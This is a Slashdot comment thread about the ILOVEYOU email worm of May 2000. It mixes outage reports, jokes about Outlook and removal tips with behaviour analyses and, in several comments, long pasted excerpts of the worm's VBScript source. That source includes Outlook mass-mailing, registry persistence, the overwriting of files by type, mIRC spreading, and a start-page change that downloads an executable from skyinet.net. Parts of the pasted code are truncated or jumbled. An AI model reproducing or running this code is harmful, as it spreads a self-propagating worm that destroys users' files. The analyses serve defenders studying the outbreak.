Slashdot Mirror
I Love You "Virus" Hates Everyone
Loquis was the first of seven billion readers to submit this story about the I Love You Virus and the UK. Its not really a virus: its a trojan that proclaims its love for the recipient and requests that you open its attachment. On a first date even! It then loves you so much that it sends copies of itself to everyone in your addressbook (slut!) and starts destorying files on your drive. Course they estimate that it's infected 10% of the UK. Pine/Elm/Mutt users as always laugh maniacally as the trojan shuffles countless wasted packets over saturated backbones filling overworked SMTP servers everywhere. Sysadmins are seen weeping in the alleys. Update: 05/04 03:12 by CT : My Roommate Kurt "The Pope" DeMaagd has written a
better summary of the trojan and more importantly a HOWTO fix it. Windows users only ;) Requires registry hacking, so its not for everyone.
We've got to come up with another venue for the kiddies to get their fame. Maybe we can bring back graffiti.
--- Submission is feudal.
From reports that are coming in it looks like it started somewhere in Asia and then moved into Europe. Alot of ISP's on South Africa have also been badly affected
OK - I suppose it's wishful thinking to hope that users would realize by now not to open e-mail attachments they know nothing about...
I have Outlook 2000 open as we speak.
So far, I've received (estimated) about fifty copies of the damn thing. It's funny, in a "well, hey, look - a train wreck" sort of way.
The email Servers where I work have been shutdown do to this nasty bugger. It came in over out WAN from Germany and the UK sometime around 3AM.
Guess it will be a quiet day today!
They would be better off calling these viruses "Mixed emotions".. perhaps our Linux team thought it was funny, but our NT team did not. ;-)
We thought it was weird, but it wouldn't run on most of my colleagues machines anyway - so I opened it using a text editor, and it's written in plain, unobfuscated text.
Lines like spread(email) are kinda obvious.
Still, the first guy who got it was distraught that she didn't love him after all:)
But the number of "If you get an email that says 'I love you', DON'T OPEN IT!" messages are getting a bit annoying.
It is already in FL and making its way through the government address books which are not small by any measure.
Life's like that
...for this sort of thing, if you know what I mean...
DrLunch.com The site that tells you what's for lunch!
What's this "Weaping" business? Is it some sort of Elmer Fudd-ism? It's WEEPING. Buy a spell checker.
This is
What the heck do I care, but it pisses me off to see that some people even at my work place can be disturbed by this. Internally we're an AIX house, for God's sake!
I think, therefore thoughts exist. Ego is just an impression.
As far as i know, the virus started out in Asia (somewhere) and made its way to Europe and now the US (Including many millitary installations as well).
Sites I've found that offer disenfectants are a post on ZDNet http://www.zdnet.com/tlkbck/comment/22/0,7056,8875 4-421758,00.html, as well as http://www.f-source.com
good luck people
It's not just the UK that getting hit hard. Things here in northern Indiana are very ugly this morning.
Hey! Those of us who use messenger are not immune to this as well. I have recieved about 10 copies of it this morning.. And the IT folks want to know why I don't want to use Outlook......
Our company was just hit by this - one NT server and two workstations down.. it deletes and renames files like there's no tomorrow.
UNIX would not have a problem here..
Maybe in the long run though - but at least a virus would "only" be able to do what the user can do - not nuke the system.
People still have to be dumb enough to open the attachment.
-- jaf
The nice thing about virus's like this is you find out about people you never met who have you in their address book....at least in my case. -Pete
Soccer Goal Plans
We've got a copy of it here, but it was caught by an on-the-ball employee that recieved it, and forwarded it to the IT department...
At the lab I'm working as a system administrator, we're jumping with joy as we see the number of companies that suffer from this virus grow. We're using iMacs, OS X server Macs, and suns running Solaris boxes, and everything is perfectly allright here :-))
Anyway, I read this over on OSOpinion ... but could MS's implanting of Outlook in nearly everything actually be more damaging than their inclusion of IE in DOS?
This is the second time in a couple of months that I've been at a company where this sort of thing has gone around and around. Companys really need to be aware of the consequences of using Outlook and Exchange. This does not happen when you are using Sendmail and a regular POP3 or IMAP client.
The difference between Canada and the USA is that in Canada healthcare is a right and gun ownership is a privilege.
Now I have to tell my girlfriend to delete all my old e-mails, because they had that subject line, and you never know!
Got Rhinos?
header_checks = regexp:/etc/postfix/header_checks
Add the following line in /etc/postfix/header_checks:
This will reject mails containing this subject.
Thanks to Claus Guttesen who posted this on the postfix mailling list.
It's a very nasty trojan, especially because it starts automatically after a reboot. To be sure what is does and doesn't, look at: ftp://weazel.student.utwente.nl/pub/mailworm.txt
Things have been fairly cool here (r&d for telecoms). They reckon it came from the Phillipines, for some reason.
I got it without an attachment, and emailed the woman back 'I'm mortified that you didn't include the letter'.
I'm not sure whether I feel like an idiot or what!
thenerd.
The camels are coming. I'm in love.
I never saw Melissa, but I did get three copies of ILOVEYOU thanks to the corporate-wide mailing list. That was this morning. Since then, our mailadmins have done an admirable job, and I've seen none. I'm glad somebody took Melissa as a wake-up call.
..as it is sooo easy to access the windows address book and Exchange from a program without even needing a password. I'm not sure how this one worked as our mail has been shut down and therefore I can't get a copy, but for there to be no need for permissions (at least, this is the case on NT) is ridiculous.
Got a beef? Plug a name into the Bizarre Rumour Generator!
This analysis I did this mornig in a rush when one of our HR girls ran it. It's a VBS worm. It spreads by two methods, irc and email. On startup it sets the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout to 0 It then copies itself to WINNT/SYSTEM32/MSKernel32.vbs WINNT/Win32DLL.vbs WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.TXT It then creates registry keys HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\MSKernel32 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices\Win32DLL which will run the script again on the next boot of the computer Next it checks to see if ie download directory is set in the registry - if it is it remembers that value, otherwise it uses c:\ instead. It then checks to see it /WINNT/SYSTEM32/WInFAT32.exe exists - if it does it sets internet explorers start page to download a file called WIN-BUGSFIX.exe from one of 4 places (randomly chosen) on www.skyinet.net It then checks to see it this file has been downloaded (i.e. when the script is run at a later date). If it has to sets this .exe to be run at next boot and resets i.e home page to about:blank (blank page) Next, it generates the file WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.HTM This basically contains the worm itself set to run when the page is viewed. Now it does to old trick of openning the Outlook address book, grabbing *all* the entries in it and emailing then an email with the subject line "ILOVEYOU" and the worm as an attachment. Now it has a look around all the drives on the machine (local drives I think) as does the following a) If it find mirc, edits it's ini file so when you next log onto an irc channel it dcc's itself to all the other users b) Overwrites any .vbs and .vbe files it finds with itself c) If it finds any vbs, vbe, css,, wsh, sct or hta files it deletes them, creates a new file with the same name ending in vbs and copies itself to it d) Does similar things to (c) to .mp3, .mp2, .jpg, .jpeg Then the script ends Stuart
I wake up this morning, check /. as usual and see this story. About 5mins after seeing the story and chuckling to myself about the entire idea of virii, guess what appeared in my inbox.. Yup A copy of this trojan for my very own ;)
that's ok! Reading the email is ok, it is running the attachment is bad! You didn't do anything
Poor old House of Commons. Seems our beloved democracy has been bought to its knees by this one.
It mails to everyone in your Outlook addressbook, not just 50. Also your MIRC nick list. It trawls all your mounted directories copying itself over all MP3's JPEGS .jpgs, style sheets and .js files amongst others
This actually managed to knock out half of our office , as well as render one of our live web servers pretty messed up , within under 10 minutes of the first person activating it. Yes, the webserver was a linux box, but one unfortunate had a subtree on a server that mirrored stuff to it mounted over a samba share
And no, you didn't have to click on it. That damn preview pane was enough to trigger it off.
-- Oh Well
Would you like to date a guy who is called "Dow" ? D'oh, I'll say.
This HTML file need ActiveX Control
To Enable to read this HTML file( 91)) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr (93)) lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr( 37)) if (l1=n) then lines(n)=chr(34)+lines(n)+chr(34) else lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if next set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-Y OU.HTM") b.close set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU .HTM",2) d.write dt5 d.write join(lines,vbcrlf) d.write vbcrlf d.write dt6 d.close end sub
- Please press #-#YES#-# button to Enable ActiveX"&vbcrlf& _ "----------z--------------------z---------- "&vbcrlf& _ ""&vbcrlf& _ ""&vbcrlf& _ ""&vbcrlf& _ ""&vbcrlf& _ ""&vbcrlf& _ ""&vbcrlf& _ "" dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'") dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/") dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\") dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'") dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\") set fso=CreateObject("Scripting.FileSystemObject") set c=fso.OpenTextFile(WScript.ScriptFullName,1) lines=Split(c.ReadAll,vbcrlf) l1=ubound(lines) for n=0 to ubound(lines) lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr
Either that, or people need to stop using the address books, which are for lusers anyway! :o)
Got Rhinos?
My job's sysadmin has already warned us that the virus was in the wild somewhere, and has asked us *not* to open anything suspicious.
I know that several large firms in my area are also scrambling to stop the infection. This virus can stop any MS system dead in its tracks and clog the others beyond repair. Tough little one!
The right to offend is far more important than the right not to be offended. (Rowan Atkinson)
Dutch news has that some 10% of bigger companies have shut down their email systems as a result of the "I LOVE YOU" virus already. It is on the radio news right now, as the first item.
.MP2 .MP3 .CSS .HTML and .JPG files, and renames them to .VBS files!
If you have a chance, take a look at the virus code, and see what some 300 lines of visual basic can cost industry in say a 24 hour period.
In fact, as I write this, a guy from our support department comes in and hands me a printed "Virus Alert" piece of paper! It says the virus sends itself to all addresses in you address book. Having looked at the code, the virus also checks if you run an IRC client, and sends itself to everyone in all channels you are in.
The virus also changes all
Hmmm... there seems to be some really bored kid out there somewhere... the first line of the virus script reads:
rem barok -loveletter(vbe)
Ron Sprenkels (sprenkel@cs.utwente.nl)
From my initial investigation it looks like it is totally MS Specific. So own up then how many /. readers have been kicked in the balls? Come out of the closet all of you!
I LOVE YOU (sorry, couldn't resist)
This virus follows the same pattern of "send to everyone in the address book", but ALSO appends the senders name to a data file included with the virus.
The recipient then falls into one of three classes:
1) Can't get/read virus.
2) Can get/read virus and gets stung (and appended to list).
3) Can get/read virus, doesn't get stung, recieved handy list of idiot coworkers.
This list can be used in a multitude of ways:
1) Reduce headcount
2) List of gullible fools who will buy $2 candy bars "to send the Girl Scouts to the Moon"
3) Identify users who need "training" (sit in a small hot room with each other and an instructor who does nothing but taunt them for their hunt-n-pecking)
--
Have Exchange users? Want to run Linux? Can't afford OpenMail?
Linux MAPI Server!
http://www.openone.com/software/MailOne/
(Exchange Migration HOWTO coming soon)
The only love letter I've ever gotten... and I can't open it....
Ceci n'est pas une sig.
What worries me, and I like to have this explained, is why people continue to use Outlook.
First it was Melissa, now it is ILOVEYOU.. you would think that someone would wake up and do something constructive such as switching to a mail program that would and could not be affected.
I've tried to reason with our NT users, telling them that we got away these two times but that the next time (because there will be a next time I'm afraid) we might not be so lucky. Are there any worthy alternatives to Outlook? [worthy enough to convince the NT group.. you know how stubborn they are.. they're almost zealots like us ;-)]
My college email comes through an Outlook web server (right here, if you're interested) and I'm wondering if I've got anything to worry about. I've tried to get the bloody admins to allow POP email clients to work with the college's system, but the morons don't know how to do it.
Outlook web admins, should I be worried at all?
Maybe in a few weeks, we will have a different worm (a small variation) saying "ILOVEYOUTOO" :)
-- jaf
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Mic
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs"
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Mic
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerh
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflf
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGR
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklN
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eqfolderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1=
scriptini.WriteLine "n2=
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,reg
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Softwar
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Softwa
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FO
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malea
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.A
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.A
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="LOVELETTER - HTML"&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
"
This HTML file need ActiveX Control
To Enable to read this HTML fileh r(91)) c hr(93)) h r(37)) Y OU.HTM") U .HTM",2)
- Please press #-#YES#-# button to Enable ActiveX"&vbcrlf& _
"----------z--------------------z---------- "&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+c
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+c
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YO
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
These kinds of viruses will continue to proliferate and cause massive disruptions and cost huge amounts of money until several large corporations get together and sue Microsoft (or other mail program manufacturers) for negligence and demand the companys selling the faulty programs pay for the costs.
The dangers of allowing running of attached programs automatically or even easily is guaranteed to cause just this problem. It will happen. It will be repeated. On a yearly basis now, perhaps, but more likely on a monthly or weekly basis in the future. The _only_ way to stop it from happening is to stop the mail program creators from _having_ these 'features'.
Stop being so arrogant. It's just an executable attachment.
For a linux version just write a bash script that'll read the users address book and send it on aswell.
This is one reason NOT to want world domination. In that case it'll spread easily
------------------------------------------------ -
"If I can shoot rabbits then I can shoot fascists" -
Here at Xerox we're getting pounded ... people are such IDIOTS!
I am, therefore you think.
-d, laughing with the rest of the Linux users
www.HearMySoulSpeak.com
http://www.heise.de Site is in German, You may want to use this little fish
"Beware of he who would deny you access to information, for in his heart he dreams himself your master."
"Who needs Outlook, when Outlook can be broken?"
{ducks}
Hrm. How many kids have ever been famous (as youngsters), historically? And would worms be reduced if the actors were *never* mentioned in press, and were basically guaranteed no fame except perhaps in their local justice system?
Only the dead have seen the end of war.
Early this morning, in response to the virus, the AP had the following report about Microsoft:
--
SEATTLE (AP) -- In response to the "ILOVEYOU" virus, Microsoft has announced that they are changing the name of their popular e-mail program to "Microsoft Lookout!"
"Really, what else could we do?" said Steve Ballmer, president of Microsoft. "I mean, first the Melissa virus, and then this. Sure, we probably should plug these security holes in Outlook -- whoops, make that Lookout! -- but we felt the name change was the most proactive step we could take short of releasing better programs."
"At least the virus didn't say 'BILLGATESLOVEYOU'," he added. "Geez, that could've been bad."
--
Sargent
One of my coworkers just walked in my office, saying 'what are .vbs documents' ?
So I looked at it, seeing the obvious VB virus in it.
Thanksfully, the OS this guy use is OPENSTEP42. Two minutes later, I received it (via gnustep discussion list). Happily, I run Mac OS X Server.
Cheers,
--fred
1 reply beneath your current threshold.
I can't wait to see traditional media respond to this. "A horrible virus from that insidous Internet thing is out there looking for your children! Details later after some other inane news."
This is an Outlook trojan. Shocker.
I'm sure M$ will deny that it even exists, talk about dark hearted hackers...then not bother to fix the bug...I'm sorry, feature that allows it to do this.
SO glad I use Eudora and Pine.
In space, no one can hear you moo.
From the MSNBC article:
X 11-to-use-the-Internet and all of that, but shouldn't there be a law against letting people this ignorant operate important computers in financial institutions??
"It crashed all the computers," said Daphne Ghesquiere, a Dow Jones spokeswoman in Hong Kong. "You get the message and the topic says ILOVEYOU, and I was among the stupid ones to open it. I got about five at one time and I was suspicious, but one was from Dow Jones Newswires, so I opened it."
Once the message was opened, Ghesquiere said, it began sending the virus to other e-mail addresses within the Dow Jones computers, blocking people's ability to send and receive e-mail. Victims sometimes received dozens of e-mails, all contaminated.
"I have no idea how it got through the firewall," Ghesquiere said. "It's supposed to be protected." (emphasis mine)
The acticle even has a screen shot of the oh-so-unsuspicious attachment: "LOVE-LETTER-FOR-YOU.TXT.vbs".
Now, I'm generally all for grandmothers sending email and not-everyone-should-have-to-be-able-to-configure-
I mean, I'm joking of course.
Or at least I think I'm joking...
My office got it this morning.
Of course the "IT staff" referred to it as a "hacker attack" *sigh* Without fail I look in my inbox every time these e-mail "viruses" hit and I'm disappointed with the # of cow-workers whom I communicate with who seemed fairly intelligent to me, up until this very point.
It doesn't only send itself via email to everyone on your list, it also (if you use mIRC) sends it to others using DCC. It wipes out files with the following extensions: MP3, MP2, CSS, HTML, JPG, JPEG, JSE, WSH, JS, SCT, HTA, and VBS (may have forgotten some). It'll muck about in your registry. It's not only in the UK... it's sweeping accross the continent as people are logging in and reading their email. Apparently it originated from Manilla, the Philippenes (or so it says in the script itself), but this maybe someone who is making someone else look bad (the email address in the script says: ispyder@mail.com). It also tries to download an executable (1 of 4 different, random executables). It changes IE's Start Page.
:-) ... Makes me all the more happy I don't use Windows.
This is someone with a serious grudge against people who use Microsoft mail programs.
There's a VSB script I saw to fix most of the damage in the registry, but it looks like the site I got it from has been slashdotted, and I don't have the necessary bandwidth to mirror it (or the original script, which I have too). Email me if you do.
Cheers!
Costyn.
The Official Steve Ballmer Webpage
This is just natural selection in action. People smart enough to use anything but Windoze aren't affected by it, except for mailbox clutter. People who avoid contact with Outlook users aren't affected by it. People who use Windoze and Outlook but are smart enough not to put anything in the hackable-as-hell address book aren't propagating it. People who don't open e-mail attachments without a thought aren't propagating it. Those who have sold their souls (and systems) to Microsoft get screwed by it. Now who can tell me what the moral of this story is?
Bugrit! Millenium hand and shrimp!
rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
The Cure of the ills of Democracy is more Democracy.
Erlang Developer and podcaster
I received a copy, but our sysadmins have a virus filter built in to the mail server, so the attachment was purged.
That should be the standard approach at any site that runs Windows.
1) It's an executable attachment (.vbs - Doh!)
2) It came from a complete stranger
no.1 was enough though
I was too curious though - had to have a look with Notepad
------------------------------------------------ -
"If I can shoot rabbits then I can shoot fascists" -
So, while I'm feeling all clever running Solaris and not Windows, POP servers everywhere are getting a sort of lovechild effect and getting a second battering!
Wouldn't you think that by now the media would have mentioned something about the evils of VB?
Luckily, I came into the office late today and everyone here is scrambling to "repair" their system.
-- ladies and gentlemen we are floating in space!
The company I work for (BaaN) suffered from the trojan as well. The email network is down (Exchange) as I type. The problem here: everybody uses one shared addressbook with over 4000 (!!) mail adresses. You can image what happens if the trojan gets hold of this ...
.... *grin*
Most of the correspondence goes through email around here (because we have departments all over the world) so you can image the damage.
And people ask me why I always ssh to my server to start pine
--
If code was hard to write, it should be hard to read
You can talk all you like about sites being slashdotted, but just try connecting to http://www.skyinet.net/ ;-)
~~~~~ BigLig2? You mean there's another one of me?
To get rid of macro virus "ILOVEYOU" This only works if you haven't gotten to get that bugfix file that set the default IE page go to start menu, find files or folders, make sure checkbox for include subfolders is checked, look for *.vbs once search is complete highlight all files(shift-downarrow), then hit shift-del, say yes to all if prompted go to settings, control panel, internet options, set homepage to use blank. shutdown and reboot it also tries to dcc an executable if you have mirc
Listen, how many email virus outbreaks will it take before people get the clue. If you get five emails with the same subject from people who do NOT love you then don't open the crap it is a virus or useless spam!
It is amazing that someone sits around and takes the time to start this nonsense anyway. God, I hate Outlook and Neanderthal technology it runs on. Still, driving innocent sysadmins insane is not the answer people.
ACK
Well, to solve this problem I installed some procmail scripts on the server that simply don't allow executable files through the mail system.
they have to at least archive them first and that will prevent 99% of these sort of nasty viruses from hitting my network.
I've already gotten five notifications that this file has been blocked.
using a virus scanner isn't good enough, because all the nastiest ones spread too quickly for the updates to matter (hence all these idiots this time with "we have a virus protection, gee why didn't it work?"
educating users is absolutely stupid, it will never work, but that is the typical windows way: blame it on the "dumb users" (and they call us nix types elitist. Bah.)
support gun control: take guns from cops
Knowing the company, and the size of their address book on the server, I can see this going on for a while yet.
Anybody seen any problems outside of MS software?
You can lead milk to a rolling horse, but too many cooks break glass houses.
Our company IT head sent out a Melissa warning at 12am one day. 3am rolled around and I had 3 copies of it already, two from the same person.
Ahh, the joys of Eudora on a Mac. I just sat back and laughed.
Pope
Freedom is Slavery! Ignorance is Strength! Monopolies offer Choice!
It doesn't mean much now, it's built for the future.
So what is it and what does it do?
It's a VBScript file using the Windows Script Host runtime (wscript.exe), which is on any W98 or W2k systems, plus those with IE4 or higher (plus several other products install it).
It propagates using OLE Automation against Outlook (any version), propagating both to Lists and individual addresses (internal function spreadtoemail()
It dicks with the registry to make one of four URL's at skyinet.net ending in /WIN-BUGFIX.exe into IE's start page (IE only as it uses IE's registry entries to do this).
Replaces any file of types vbs, vbe, js, jse, css, wsh, sct, hta, jpg, jpeg, mp2, mp3 with a copy of itself.
Places copies of itself into \windows and \windows\system as win32DLL.vbs and MSkernel32.vbs and tweaks the registry so that these are loaded at startup
builds a webpage and displays it, including a request for the user to disable ActiveX security.
If you're non Win32 it's totally irrelevant. If you're Win32 but don't use Outlook it'll bugger about with some files but won't propagate. If you're Windows All The Way then it's trouble.
Not only don't i like his coding style, but he doesn't even realize you can encode vbs files for obfuscation.
It's hit 340 lists at our firm so far.
TomV
I had 16 copies of it this morning when I came in, saved a copy to look at in a text editor, and it never activated.
Weird... I have a slightly different version which has an additional "tag" in the header:
The Official Steve Ballmer Webpage
Many people in our company recieved the message, but because of the signs posted everywhere most of us around here didn't open the message. Right now I've got Outlook Express open and logged in to the exchange server through IMAP. I don't know how much that'll help, but I can always hope, can't I? Hell, at least I'm reading the really important email (stuff from my wife) through my ssh session with my server at home. I know Pine isn't susceptible to that shit.
That'll teach me to preview... what it says is: < i hate go to school>
The Official Steve Ballmer Webpage
since we use Outlook/Exchange for mail after migrating (partially) away from Novell and Groupwise...never mind that there's a large Mac presence at NIH, and the Mac client is way lame and not compatible with the Windows version (yet).
Some of this was my employer's idea, as well. (The migration, not the virus.)
Basically, even though 90% of the machines I support are not affected, everybody has to go without mail because they've turned off the Exchange server. I FUCKING FUCKING FUCKING hate Outlook!
I use Macs for work, Linux for education, and Windows for cardplaying.
Nothing spreads like an email virus. So why not spread some "innoculation" the same way? VirusEdu.exe: Shows you splash screens (a la Microsoft installers) on the evils of opening unsolicited, executable attachments while infecting your computer. "Tell me more" button has a list of email clients that don't automagically execute unknown programs.
--
Have Exchange users? Want to run Linux? Can't afford OpenMail?
Linux MAPI Server!
http://www.openone.com/software/MailOne/
(Exchange Migration HOWTO coming soon)
Okay, given a lot of the notices I've seen on this worm so far seem to be inaccurate, here's the rundown:
n \MSKernel32 [created to run MSKernel32.vbs]n Services\Win32DLL [created to run Win32DLL.vbs]n \WIN-BUGSFIX [created to run WIN-BUGSFIX.exe once downloaded]
.exe it attempts to download (other than its marker) because all the traffic has taken the target server the file is held on (www.skyinet.net) down.
Files created/edited:
MSKernel32.vbs [created in System folder, copy of worm]
Win32DLL.vbs [created in Windows folder, copy of worm]
LOVE-LETTER-FOR-YOU.TXT.vbs [created in System folder, copy of worm]
LOVE-LETTER-FOR-YOU.HTM [created in System folder, web page with worm embedded in it]
WIN-BUGSFIX.exe [downloaded into default IE download folder]
WinFAT32.exe [created in System folder by WIN-BUGSFIX32.exe, unknown purpose]
*.vbs, *.vbe [overwritten with copy of worm]
*.js, *.jse, *.css, *.wsh, *.sct, *.hta [deleted, replaced with copy of worm with name <filename>.vbs]
*.jpg, *.jpeg [deleted, replaced with copy of worm with name <filename>.<ext>.vbs]
*.mp3, *.mp2 [hidden attribute set, copy of worm with name <filename>.<ext>.vbs created]
script.ini [if found in a directory with mIRC, overwritten with a script to output the HTML version of the worm to other users]
Registry keys created/edited:
HKLM\Software\Microsoft\Windows\CurrentVersion\Ru
HKLM\Software\Microsoft\Windows\CurrentVersion\Ru
